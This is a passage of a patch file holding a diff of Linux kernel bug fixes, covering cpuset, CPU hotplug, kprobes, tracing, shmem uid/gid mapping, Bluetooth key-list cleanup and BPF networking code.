+-		    cpumask_equal(tmp->new_cpus, cp->effective_cpus)) {
++		    cpumask_equal(tmp->new_cpus, cp->effective_cpus) &&
++		    (!cgroup_subsys_on_dfl(cpuset_cgrp_subsys) ||
++		    (is_sched_load_balance(parent) == is_sched_load_balance(cp)))) {
+ 			pos_css = css_rightmost_descendant(pos_css);
+ 			continue;
+ 		}
+@@ -1693,6 +1698,20 @@ update_parent_subparts:
+ 
+ 		update_tasks_cpumask(cp, tmp->new_cpus);
+ 
++		/*
++		 * On default hierarchy, inherit the CS_SCHED_LOAD_BALANCE
++		 * from parent if current cpuset isn't a valid partition root
++		 * and their load balance states differ.
++		 */
++		if (cgroup_subsys_on_dfl(cpuset_cgrp_subsys) &&
++		    !is_partition_valid(cp) &&
++		    (is_sched_load_balance(parent) != is_sched_load_balance(cp))) {
++			if (is_sched_load_balance(parent))
++				set_bit(CS_SCHED_LOAD_BALANCE, &cp->flags);
++			else
++				clear_bit(CS_SCHED_LOAD_BALANCE, &cp->flags);
++		}
++
+ 		/*
+ 		 * On legacy hierarchy, if the effective cpumask of any non-
+ 		 * empty cpuset is changed, we need to rebuild sched domains.
+@@ -3213,6 +3232,14 @@ static int cpuset_css_online(struct cgroup_subsys_state *css)
+ 		cs->use_parent_ecpus = true;
+ 		parent->child_ecpus_count++;
+ 	}
++
++	/*
++	 * For v2, clear CS_SCHED_LOAD_BALANCE if parent is isolated
++	 */
++	if (cgroup_subsys_on_dfl(cpuset_cgrp_subsys) &&
++	    !is_sched_load_balance(parent))
++		clear_bit(CS_SCHED_LOAD_BALANCE, &cs->flags);
++
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (!test_bit(CGRP_CPUSET_CLONE_CHILDREN, &css->cgroup->flags))
+diff --git a/kernel/cgroup/namespace.c b/kernel/cgroup/namespace.c
+index 0d5c29879a50b..144a464e45c66 100644
+--- a/kernel/cgroup/namespace.c
++++ b/kernel/cgroup/namespace.c
+@@ -149,9 +149,3 @@ const struct proc_ns_operations cgroupns_operations = {
+ 	.install	= cgroupns_install,
+ 	.owner		= cgroupns_owner,
+ };
+-
+-static __init int cgroup_namespaces_init(void)
+-{
+-	return 0;
+-}
+-subsys_initcall(cgroup_namespaces_init);
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 98a7a7b1471b7..f8eb1825f704f 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -1215,8 +1215,22 @@ out:
+ 	return ret;
+ }
+ 
++struct cpu_down_work {
++	unsigned int		cpu;
++	enum cpuhp_state	target;
++};
++
++static long __cpu_down_maps_locked(void *arg)
++{
++	struct cpu_down_work *work = arg;
++
++	return _cpu_down(work->cpu, 0, work->target);
++}
++
+ static int cpu_down_maps_locked(unsigned int cpu, enum cpuhp_state target)
+ {
++	struct cpu_down_work work = { .cpu = cpu, .target = target, };
++
+ 	/*
+ 	 * If the platform does not support hotplug, report it explicitly to
+ 	 * differentiate it from a transient offlining failure.
+@@ -1225,7 +1239,15 @@ static int cpu_down_maps_locked(unsigned int cpu, enum cpuhp_state target)
+ 		return -EOPNOTSUPP;
+ 	if (cpu_hotplug_disabled)
+ 		return -EBUSY;
+-	return _cpu_down(cpu, 0, target);
++
++	/*
++	 * Ensure that the control task does not run on the to be offlined
++	 * CPU to prevent a deadlock against cfs_b->period_timer.
++	 */
++	cpu = cpumask_any_but(cpu_online_mask, cpu);
++	if (cpu >= nr_cpu_ids)
++		return -EBUSY;
++	return work_on_cpu(cpu, __cpu_down_maps_locked, &work);
+ }
+ 
+ static int cpu_down(unsigned int cpu, enum cpuhp_state target)
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 00e177de91ccd..3da9726232ff9 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -1545,6 +1545,17 @@ static int check_ftrace_location(struct kprobe *p)
+ 	return 0;
+ }
+ 
++static bool is_cfi_preamble_symbol(unsigned long addr)
++{
++	char symbuf[KSYM_NAME_LEN];
++
++	if (lookup_symbol_name(addr, symbuf))
++		return false;
++
++	return str_has_prefix("__cfi_", symbuf) ||
++		str_has_prefix("__pfx_", symbuf);
++}
++
+ static int check_kprobe_address_safe(struct kprobe *p,
+ 				     struct module **probed_mod)
+ {
+@@ -1563,7 +1574,8 @@ static int check_kprobe_address_safe(struct kprobe *p,
+ 	    within_kprobe_blacklist((unsigned long) p->addr) ||
+ 	    jump_label_text_reserved(p->addr, p->addr) ||
+ 	    static_call_text_reserved(p->addr, p->addr) ||
+-	    find_bug((unsigned long)p->addr)) {
++	    find_bug((unsigned long)p->addr) ||
++	    is_cfi_preamble_symbol((unsigned long)p->addr)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/kernel/printk/printk_ringbuffer.c b/kernel/printk/printk_ringbuffer.c
+index 2b7b6ddab4f70..0bbcd1344f218 100644
+--- a/kernel/printk/printk_ringbuffer.c
++++ b/kernel/printk/printk_ringbuffer.c
+@@ -1735,7 +1735,7 @@ static bool copy_data(struct prb_data_ring *data_ring,
+ 	if (!buf || !buf_size)
+ 		return true;
+ 
+-	data_size = min_t(u16, buf_size, len);
++	data_size = min_t(unsigned int, buf_size, len);
+ 
+ 	memcpy(&buf[0], data, data_size); /* LMM(copy_data:A) */
+ 	return true;
+diff --git a/kernel/rcu/refscale.c b/kernel/rcu/refscale.c
+index d49a9d66e0000..3a93c53f615f0 100644
+--- a/kernel/rcu/refscale.c
++++ b/kernel/rcu/refscale.c
+@@ -867,12 +867,11 @@ ref_scale_init(void)
+ 	VERBOSE_SCALEOUT("Starting %d reader threads", nreaders);
+ 
+ 	for (i = 0; i < nreaders; i++) {
++		init_waitqueue_head(&reader_tasks[i].wq);
+ 		firsterr = torture_create_kthread(ref_scale_reader, (void *)i,
+ 						  reader_tasks[i].task);
+ 		if (torture_init_error(firsterr))
+ 			goto unwind;
+-
+-		init_waitqueue_head(&(reader_tasks[i].wq));
+ 	}
+ 
+ 	// Main Task
+diff --git a/kernel/resource.c b/kernel/resource.c
+index 1aeeededdd4c8..8f52f88009652 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1693,18 +1693,15 @@ static int strict_iomem_checks;
+  *
+  * Returns true if exclusive to the kernel, otherwise returns false.
+  */
+-bool iomem_is_exclusive(u64 addr)
++bool resource_is_exclusive(struct resource *root, u64 addr, resource_size_t size)
+ {
+ 	const unsigned int exclusive_system_ram = IORESOURCE_SYSTEM_RAM |
+ 						  IORESOURCE_EXCLUSIVE;
+ 	bool skip_children = false, err = false;
+-	int size = PAGE_SIZE;
+ 	struct resource *p;
+ 
+-	addr = addr & PAGE_MASK;
+-
+ 	read_lock(&resource_lock);
+-	for_each_resource(&iomem_resource, p, skip_children) {
++	for_each_resource(root, p, skip_children) {
+ 		if (p->start >= addr + size)
+ 			break;
+ 		if (p->end < addr) {
+@@ -1743,6 +1740,12 @@ bool iomem_is_exclusive(u64 addr)
+ 	return err;
+ }
+ 
++bool iomem_is_exclusive(u64 addr)
++{
++	return resource_is_exclusive(&iomem_resource, addr & PAGE_MASK,
++				     PAGE_SIZE);
++}
++
+ struct resource_entry *resource_list_create_entry(struct resource *res,
+ 						  size_t extra_size)
+ {
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 4f5796dd26a56..576eb2f51f043 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -25,7 +25,7 @@ unsigned int sysctl_sched_rt_period = 1000000;
+ int sysctl_sched_rt_runtime = 950000;
+ 
+ #ifdef CONFIG_SYSCTL
+-static int sysctl_sched_rr_timeslice = (MSEC_PER_SEC / HZ) * RR_TIMESLICE;
++static int sysctl_sched_rr_timeslice = (MSEC_PER_SEC * RR_TIMESLICE) / HZ;
+ static int sched_rt_handler(struct ctl_table *table, int write, void *buffer,
+ 		size_t *lenp, loff_t *ppos);
+ static int sched_rr_handler(struct ctl_table *table, int write, void *buffer,
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index 1ad89eec2a55f..798e1841d2863 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1050,7 +1050,7 @@ static bool report_idle_softirq(void)
+ 		return false;
+ 
+ 	/* On RT, softirqs handling may be waiting on some lock */
+-	if (!local_bh_blocked())
++	if (local_bh_blocked())
+ 		return false;
+ 
+ 	pr_warn("NOHZ tick-stop error: local softirq work is pending, handler #%02x!!!\n",
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index ad04390883ada..9fc5db194027b 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -2390,7 +2390,7 @@ int bpf_get_perf_event_info(const struct perf_event *event, u32 *prog_id,
+ #ifdef CONFIG_UPROBE_EVENTS
+ 		if (flags & TRACE_EVENT_FL_UPROBE)
+ 			err = bpf_get_uprobe_info(event, fd_type, buf,
+-						  probe_offset,
++						  probe_offset, probe_addr,
+ 						  event->attr.type == PERF_TYPE_TRACEPOINT);
+ #endif
+ 	}
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 1a87cb70f1eb5..54ccdca395311 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -6616,10 +6616,36 @@ tracing_max_lat_write(struct file *filp, const char __user *ubuf,
+ 
+ #endif
+ 
++static int open_pipe_on_cpu(struct trace_array *tr, int cpu)
++{
++	if (cpu == RING_BUFFER_ALL_CPUS) {
++		if (cpumask_empty(tr->pipe_cpumask)) {
++			cpumask_setall(tr->pipe_cpumask);
++			return 0;
++		}
++	} else if (!cpumask_test_cpu(cpu, tr->pipe_cpumask)) {
++		cpumask_set_cpu(cpu, tr->pipe_cpumask);
++		return 0;
++	}
++	return -EBUSY;
++}
++
++static void close_pipe_on_cpu(struct trace_array *tr, int cpu)
++{
++	if (cpu == RING_BUFFER_ALL_CPUS) {
++		WARN_ON(!cpumask_full(tr->pipe_cpumask));
++		cpumask_clear(tr->pipe_cpumask);
++	} else {
++		WARN_ON(!cpumask_test_cpu(cpu, tr->pipe_cpumask));
++		cpumask_clear_cpu(cpu, tr->pipe_cpumask);
++	}
++}
++
+ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ {
+ 	struct trace_array *tr = inode->i_private;
+ 	struct trace_iterator *iter;
++	int cpu;
+ 	int ret;
+ 
+ 	ret = tracing_check_open_get_tr(tr);
+@@ -6627,13 +6653,16 @@ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ 		return ret;
+ 
+ 	mutex_lock(&trace_types_lock);
++	cpu = tracing_get_cpu(inode);
++	ret = open_pipe_on_cpu(tr, cpu);
++	if (ret)
++		goto fail_pipe_on_cpu;
+ 
+ 	/* create a buffer to store the information to pass to userspace */
+ 	iter = kzalloc(sizeof(*iter), GFP_KERNEL);
+ 	if (!iter) {
+ 		ret = -ENOMEM;
+-		__trace_array_put(tr);
+-		goto out;
++		goto fail_alloc_iter;
+ 	}
+ 
+ 	trace_seq_init(&iter->seq);
+@@ -6656,7 +6685,7 @@ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ 
+ 	iter->tr = tr;
+ 	iter->array_buffer = &tr->array_buffer;
+-	iter->cpu_file = tracing_get_cpu(inode);
++	iter->cpu_file = cpu;
+ 	mutex_init(&iter->mutex);
+ 	filp->private_data = iter;
+ 
+@@ -6666,12 +6695,15 @@ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ 	nonseekable_open(inode, filp);
+ 
+ 	tr->trace_ref++;
+-out:
++
+ 	mutex_unlock(&trace_types_lock);
+ 	return ret;
+ 
+ fail:
+ 	kfree(iter);
++fail_alloc_iter:
++	close_pipe_on_cpu(tr, cpu);
++fail_pipe_on_cpu:
+ 	__trace_array_put(tr);
+ 	mutex_unlock(&trace_types_lock);
+ 	return ret;
+@@ -6688,7 +6720,7 @@ static int tracing_release_pipe(struct inode *inode, struct file *file)
+ 
+ 	if (iter->trace->pipe_close)
+ 		iter->trace->pipe_close(iter);
+-
++	close_pipe_on_cpu(tr, iter->cpu_file);
+ 	mutex_unlock(&trace_types_lock);
+ 
+ 	free_cpumask_var(iter->started);
+@@ -7484,6 +7516,11 @@ out:
+ 	return ret;
+ }
+ 
++static void tracing_swap_cpu_buffer(void *tr)
++{
++	update_max_tr_single((struct trace_array *)tr, current, smp_processor_id());
++}
++
+ static ssize_t
+ tracing_snapshot_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 		       loff_t *ppos)
+@@ -7542,13 +7579,15 @@ tracing_snapshot_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 			ret = tracing_alloc_snapshot_instance(tr);
+ 		if (ret < 0)
+ 			break;
+-		local_irq_disable();
+ 		/* Now, we're going to swap */
+-		if (iter->cpu_file == RING_BUFFER_ALL_CPUS)
++		if (iter->cpu_file == RING_BUFFER_ALL_CPUS) {
++			local_irq_disable();
+ 			update_max_tr(tr, current, smp_processor_id(), NULL);
+-		else
+-			update_max_tr_single(tr, current, iter->cpu_file);
+-		local_irq_enable();
++			local_irq_enable();
++		} else {
++			smp_call_function_single(iter->cpu_file, tracing_swap_cpu_buffer,
++						 (void *)tr, 1);
++		}
+ 		break;
+ 	default:
+ 		if (tr->allocated_snapshot) {
+@@ -9356,6 +9395,9 @@ static struct trace_array *trace_array_create(const char *name)
+ 	if (!alloc_cpumask_var(&tr->tracing_cpumask, GFP_KERNEL))
+ 		goto out_free_tr;
+ 
++	if (!zalloc_cpumask_var(&tr->pipe_cpumask, GFP_KERNEL))
++		goto out_free_tr;
++
+ 	tr->trace_flags = global_trace.trace_flags & ~ZEROED_TRACE_FLAGS;
+ 
+ 	cpumask_copy(tr->tracing_cpumask, cpu_all_mask);
+@@ -9397,6 +9439,7 @@ static struct trace_array *trace_array_create(const char *name)
+  out_free_tr:
+ 	ftrace_free_ftrace_ops(tr);
+ 	free_trace_buffers(tr);
++	free_cpumask_var(tr->pipe_cpumask);
+ 	free_cpumask_var(tr->tracing_cpumask);
+ 	kfree(tr->name);
+ 	kfree(tr);
+@@ -9499,6 +9542,7 @@ static int __remove_instance(struct trace_array *tr)
+ 	}
+ 	kfree(tr->topts);
+ 
++	free_cpumask_var(tr->pipe_cpumask);
+ 	free_cpumask_var(tr->tracing_cpumask);
+ 	kfree(tr->name);
+ 	kfree(tr);
+@@ -10223,12 +10267,14 @@ __init static int tracer_alloc_buffers(void)
+ 	if (trace_create_savedcmd() < 0)
+ 		goto out_free_temp_buffer;
+ 
++	if (!zalloc_cpumask_var(&global_trace.pipe_cpumask, GFP_KERNEL))
++		goto out_free_savedcmd;
++
+ 	/* TODO: make the number of buffers hot pluggable with CPUS */
+ 	if (allocate_trace_buffers(&global_trace, ring_buf_size) < 0) {
+ 		MEM_FAIL(1, "tracer: failed to allocate ring buffer!\n");
+-		goto out_free_savedcmd;
++		goto out_free_pipe_cpumask;
+ 	}
+-
+ 	if (global_trace.buffer_disabled)
+ 		tracing_off();
+ 
+@@ -10281,6 +10327,8 @@ __init static int tracer_alloc_buffers(void)
+ 
+ 	return 0;
+ 
++out_free_pipe_cpumask:
++	free_cpumask_var(global_trace.pipe_cpumask);
+ out_free_savedcmd:
+ 	free_saved_cmdlines_buffer(savedcmd);
+ out_free_temp_buffer:
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 3d3505286aa7f..dbb86b0dd3b7b 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -366,6 +366,8 @@ struct trace_array {
+ 	struct list_head	events;
+ 	struct trace_event_file *trace_marker_file;
+ 	cpumask_var_t		tracing_cpumask; /* only trace on set CPUs */
++	/* one per_cpu trace_pipe can be opened by only one user */
++	cpumask_var_t		pipe_cpumask;
+ 	int			ref;
+ 	int			trace_ref;
+ #ifdef CONFIG_FUNCTION_TRACER
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index 2f37a6e68aa9f..b791524a6536a 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -635,7 +635,7 @@ static int s_mode_show(struct seq_file *s, void *v)
+ 	else
+ 		seq_printf(s, "%s", thread_mode_str[mode]);
+ 
+-	if (mode != MODE_MAX)
++	if (mode < MODE_MAX - 1) /* if mode is any but last */
+ 		seq_puts(s, " ");
+ 
+ 	return 0;
+diff --git a/kernel/trace/trace_uprobe.c b/kernel/trace/trace_uprobe.c
+index 2ac06a642863a..127c78aec17db 100644
+--- a/kernel/trace/trace_uprobe.c
++++ b/kernel/trace/trace_uprobe.c
+@@ -1418,7 +1418,7 @@ static void uretprobe_perf_func(struct trace_uprobe *tu, unsigned long func,
+ 
+ int bpf_get_uprobe_info(const struct perf_event *event, u32 *fd_type,
+ 			const char **filename, u64 *probe_offset,
+-			bool perf_type_tracepoint)
++			u64 *probe_addr, bool perf_type_tracepoint)
+ {
+ 	const char *pevent = trace_event_name(event->tp_event);
+ 	const char *group = event->tp_event->class->system;
+@@ -1435,6 +1435,7 @@ int bpf_get_uprobe_info(const struct perf_event *event, u32 *fd_type,
+ 				    : BPF_FD_TYPE_UPROBE;
+ 	*filename = tu->filename;
+ 	*probe_offset = tu->offset;
++	*probe_addr = 0;
+ 	return 0;
+ }
+ #endif	/* CONFIG_PERF_EVENTS */
+diff --git a/lib/xarray.c b/lib/xarray.c
+index ea9ce1f0b3863..e9bd29826e8b0 100644
+--- a/lib/xarray.c
++++ b/lib/xarray.c
+@@ -204,7 +204,7 @@ static void *xas_descend(struct xa_state *xas, struct xa_node *node)
+ 	void *entry = xa_entry(xas->xa, node, offset);
+ 
+ 	xas->xa_node = node;
+-	if (xa_is_sibling(entry)) {
++	while (xa_is_sibling(entry)) {
+ 		offset = xa_to_sibling(entry);
+ 		entry = xa_entry(xas->xa, node, offset);
+ 		if (node->shift && xa_is_node(entry))
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 10365ced5b1fc..806741bbe4a68 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -3485,6 +3485,8 @@ static int shmem_parse_one(struct fs_context *fc, struct fs_parameter *param)
+ 	unsigned long long size;
+ 	char *rest;
+ 	int opt;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+ 	opt = fs_parse(fc, shmem_fs_parameters, param, &result);
+ 	if (opt < 0)
+@@ -3520,14 +3522,32 @@ static int shmem_parse_one(struct fs_context *fc, struct fs_parameter *param)
+ 		ctx->mode = result.uint_32 & 07777;
+ 		break;
+ 	case Opt_uid:
+-		ctx->uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(ctx->uid))
++		kuid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(kuid))
+ 			goto bad_value;
++
++		/*
++		 * The requested uid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kuid_has_mapping(fc->user_ns, kuid))
++			goto bad_value;
++
++		ctx->uid = kuid;
+ 		break;
+ 	case Opt_gid:
+-		ctx->gid = make_kgid(current_user_ns(), result.uint_32);
+-		if (!gid_valid(ctx->gid))
++		kgid = make_kgid(current_user_ns(), result.uint_32);
++		if (!gid_valid(kgid))
+ 			goto bad_value;
++
++		/*
++		 * The requested gid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kgid_has_mapping(fc->user_ns, kgid))
++			goto bad_value;
++
++		ctx->gid = kgid;
+ 		break;
+ 	case Opt_huge:
+ 		ctx->huge = result.uint_32;
+diff --git a/mm/util.c b/mm/util.c
+index 12984e76767eb..ce3bb17c97b9d 100644
+--- a/mm/util.c
++++ b/mm/util.c
+@@ -1127,7 +1127,9 @@ void mem_dump_obj(void *object)
+ 	if (vmalloc_dump_obj(object))
+ 		return;
+ 
+-	if (virt_addr_valid(object))
++	if (is_vmalloc_addr(object))
++		type = "vmalloc memory";
++	else if (virt_addr_valid(object))
+ 		type = "non-slab/vmalloc memory";
+ 	else if (object == NULL)
+ 		type = "NULL pointer";
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index 80bd104a4d42e..67a10a04df041 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -4041,14 +4041,32 @@ void pcpu_free_vm_areas(struct vm_struct **vms, int nr_vms)
+ #ifdef CONFIG_PRINTK
+ bool vmalloc_dump_obj(void *object)
+ {
+-	struct vm_struct *vm;
+ 	void *objp = (void *)PAGE_ALIGN((unsigned long)object);
++	const void *caller;
++	struct vm_struct *vm;
++	struct vmap_area *va;
++	unsigned long addr;
++	unsigned int nr_pages;
++
++	if (!spin_trylock(&vmap_area_lock))
++		return false;
++	va = __find_vmap_area((unsigned long)objp, &vmap_area_root);
++	if (!va) {
++		spin_unlock(&vmap_area_lock);
++		return false;
++	}
+ 
+-	vm = find_vm_area(objp);
+-	if (!vm)
++	vm = va->vm;
++	if (!vm) {
++		spin_unlock(&vmap_area_lock);
+ 		return false;
++	}
++	addr = (unsigned long)vm->addr;
++	caller = vm->caller;
++	nr_pages = vm->nr_pages;
++	spin_unlock(&vmap_area_lock);
+ 	pr_cont(" %u-page vmalloc region starting at %#lx allocated at %pS\n",
+-		vm->nr_pages, (unsigned long)vm->addr, vm->caller);
++		nr_pages, addr, caller);
+ 	return true;
+ }
+ #endif
+diff --git a/mm/vmpressure.c b/mm/vmpressure.c
+index b52644771cc43..22c6689d93027 100644
+--- a/mm/vmpressure.c
++++ b/mm/vmpressure.c
+@@ -244,6 +244,14 @@ void vmpressure(gfp_t gfp, struct mem_cgroup *memcg, bool tree,
+ 	if (mem_cgroup_disabled())
+ 		return;
+ 
++	/*
++	 * The in-kernel users only care about the reclaim efficiency
++	 * for this @memcg rather than the whole subtree, and there
++	 * isn't and won't be any in-kernel user in a legacy cgroup.
++	 */
++	if (!cgroup_subsys_on_dfl(memory_cgrp_subsys) && !tree)
++		return;
++
+ 	vmpr = memcg_to_vmpressure(memcg);
+ 
+ 	/*
+diff --git a/net/9p/trans_virtio.c b/net/9p/trans_virtio.c
+index 3f3eb03cda7d6..3cf660d8a0a7b 100644
+--- a/net/9p/trans_virtio.c
++++ b/net/9p/trans_virtio.c
+@@ -385,7 +385,7 @@ static void handle_rerror(struct p9_req_t *req, int in_hdr_len,
+ 	void *to = req->rc.sdata + in_hdr_len;
+ 
+ 	// Fits entirely into the static data?  Nothing to do.
+-	if (req->rc.size < in_hdr_len)
++	if (req->rc.size < in_hdr_len || !pages)
+ 		return;
+ 
+ 	// Really long error message?  Tough, truncate the reply.  Might get
+@@ -429,7 +429,7 @@ p9_virtio_zc_request(struct p9_client *client, struct p9_req_t *req,
+ 	struct page **in_pages = NULL, **out_pages = NULL;
+ 	struct virtio_chan *chan = client->trans;
+ 	struct scatterlist *sgs[4];
+-	size_t offs;
++	size_t offs = 0;
+ 	int need_drop = 0;
+ 	int kicked = 0;
+ 
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d034bf2a999e1..146553c0054f6 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1074,9 +1074,9 @@ void hci_uuids_clear(struct hci_dev *hdev)
+ 
+ void hci_link_keys_clear(struct hci_dev *hdev)
+ {
+-	struct link_key *key;
++	struct link_key *key, *tmp;
+ 
+-	list_for_each_entry(key, &hdev->link_keys, list) {
++	list_for_each_entry_safe(key, tmp, &hdev->link_keys, list) {
+ 		list_del_rcu(&key->list);
+ 		kfree_rcu(key, rcu);
+ 	}
+@@ -1084,9 +1084,9 @@ void hci_link_keys_clear(struct hci_dev *hdev)
+ 
+ void hci_smp_ltks_clear(struct hci_dev *hdev)
+ {
+-	struct smp_ltk *k;
++	struct smp_ltk *k, *tmp;
+ 
+-	list_for_each_entry(k, &hdev->long_term_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->long_term_keys, list) {
+ 		list_del_rcu(&k->list);
+ 		kfree_rcu(k, rcu);
+ 	}
+@@ -1094,9 +1094,9 @@ void hci_smp_ltks_clear(struct hci_dev *hdev)
+ 
+ void hci_smp_irks_clear(struct hci_dev *hdev)
+ {
+-	struct smp_irk *k;
++	struct smp_irk *k, *tmp;
+ 
+-	list_for_each_entry(k, &hdev->identity_resolving_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->identity_resolving_keys, list) {
+ 		list_del_rcu(&k->list);
+ 		kfree_rcu(k, rcu);
+ 	}
+@@ -1104,9 +1104,9 @@ void hci_smp_irks_clear(struct hci_dev *hdev)
+ 
+ void hci_blocked_keys_clear(struct hci_dev *hdev)
+ {
+-	struct blocked_key *b;
++	struct blocked_key *b, *tmp;
+ 
+-	list_for_each_entry(b, &hdev->blocked_keys, list) {
++	list_for_each_entry_safe(b, tmp, &hdev->blocked_keys, list) {
+ 		list_del_rcu(&b->list);
+ 		kfree_rcu(b, rcu);
+ 	}
+@@ -1949,15 +1949,15 @@ int hci_add_adv_monitor(struct hci_dev *hdev, struct adv_monitor *monitor)
+ 
+ 	switch (hci_get_adv_monitor_offload_ext(hdev)) {
+ 	case HCI_ADV_MONITOR_EXT_NONE:
+-		bt_dev_dbg(hdev, "%s add monitor %d status %d", hdev->name,
++		bt_dev_dbg(hdev, "add monitor %d status %d",
+ 			   monitor->handle, status);
+ 		/* Message was not forwarded to controller - not an error */
+ 		break;
+ 
+ 	case HCI_ADV_MONITOR_EXT_MSFT:
+ 		status = msft_add_monitor_pattern(hdev, monitor);
+-		bt_dev_dbg(hdev, "%s add monitor %d msft status %d", hdev->name,
+-			   monitor->handle, status);
++		bt_dev_dbg(hdev, "add monitor %d msft status %d",
++			   handle, status);
+ 		break;
+ 	}
+ 
+@@ -1976,15 +1976,15 @@ static int hci_remove_adv_monitor(struct hci_dev *hdev,
+ 
+ 	switch (hci_get_adv_monitor_offload_ext(hdev)) {
+ 	case HCI_ADV_MONITOR_EXT_NONE: /* also goes here when powered off */
+-		bt_dev_dbg(hdev, "%s remove monitor %d status %d", hdev->name,
++		bt_dev_dbg(hdev, "remove monitor %d status %d",
+ 			   monitor->handle, status);
+ 		goto free_monitor;
+ 
+ 	case HCI_ADV_MONITOR_EXT_MSFT:
+ 		handle = monitor->handle;
+ 		status = msft_remove_monitor(hdev, monitor);
+-		bt_dev_dbg(hdev, "%s remove monitor %d msft status %d",
+-			   hdev->name, handle, status);
++		bt_dev_dbg(hdev, "remove monitor %d msft status %d",
++			   handle, status);
+ 		break;
+ 	}
+ 
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 699e4f400df29..5cd2e775915be 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -1394,7 +1394,7 @@ static int iso_sock_release(struct socket *sock)
+ 
+ 	iso_sock_close(sk);
+ 
+-	if (sock_flag(sk, SOCK_LINGER) && sk->sk_lingertime &&
++	if (sock_flag(sk, SOCK_LINGER) && READ_ONCE(sk->sk_lingertime) &&
+ 	    !(current->flags & PF_EXITING)) {
+ 		lock_sock(sk);
+ 		err = bt_sock_wait_state(sk, BT_CLOSED, sk->sk_lingertime);
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 1755f91a66f6a..6d4168cfeb563 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -1255,7 +1255,7 @@ static int sco_sock_release(struct socket *sock)
+ 
+ 	sco_sock_close(sk);
+ 
+-	if (sock_flag(sk, SOCK_LINGER) && sk->sk_lingertime &&
++	if (sock_flag(sk, SOCK_LINGER) && READ_ONCE(sk->sk_lingertime) &&
+ 	    !(current->flags & PF_EXITING)) {
+ 		lock_sock(sk);
+ 		err = bt_sock_wait_state(sk, BT_CLOSED, sk->sk_lingertime);
+diff --git a/net/bridge/br_stp_if.c b/net/bridge/br_stp_if.c
+index b65962682771f..75204d36d7f90 100644
+--- a/net/bridge/br_stp_if.c
++++ b/net/bridge/br_stp_if.c
+@@ -201,9 +201,6 @@ int br_stp_set_enabled(struct net_bridge *br, unsigned long val,
+ {
+ 	ASSERT_RTNL();
+ 
+-	if (!net_eq(dev_net(br->dev), &init_net))
+-		NL_SET_ERR_MSG_MOD(extack, "STP does not work in non-root netns");
+-
+ 	if (br_mrp_enabled(br)) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "STP can't be enabled if MRP is already enabled");
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 419ce7c61bd6b..9fd7c88b5db4e 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -7259,6 +7259,8 @@ BPF_CALL_3(bpf_sk_assign, struct sk_buff *, skb, struct sock *, sk, u64, flags)
+ 		return -ENETUNREACH;
+ 	if (unlikely(sk_fullsock(sk) && sk->sk_reuseport))
+ 		return -ESOCKTNOSUPPORT;
++	if (sk_unhashed(sk))
++		return -EOPNOTSUPP;
+ 	if (sk_is_refcounted(sk) &&
+ 	    unlikely(!refcount_inc_not_zero(&sk->sk_refcnt)))
+ 		return -ENOENT;
+diff --git a/net/core/lwt_bpf.c b/net/core/lwt_bpf.c
+index 8b6b5e72b2179..4a0797f0a154b 100644
+--- a/net/core/lwt_bpf.c
++++ b/net/core/lwt_bpf.c
+@@ -60,9 +60,8 @@ static int run_lwt_bpf(struct sk_buff *skb, struct bpf_lwt_prog *lwt,
+ 			ret = BPF_OK;
+ 		} else {
+ 			skb_reset_mac_header(skb);
+-			ret = skb_do_redirect(skb);
+-			if (ret == 0)
+-				ret = BPF_REDIRECT;
++			skb_do_redirect(skb);
++			ret = BPF_REDIRECT;
+ 		}
+ 		break;
+ 
+@@ -255,7 +254,7 @@ static int bpf_lwt_xmit_reroute(struct sk_buff *skb)
+ 
+ 	err = dst_output(dev_net(skb_dst(skb)->dev), skb->sk, skb);
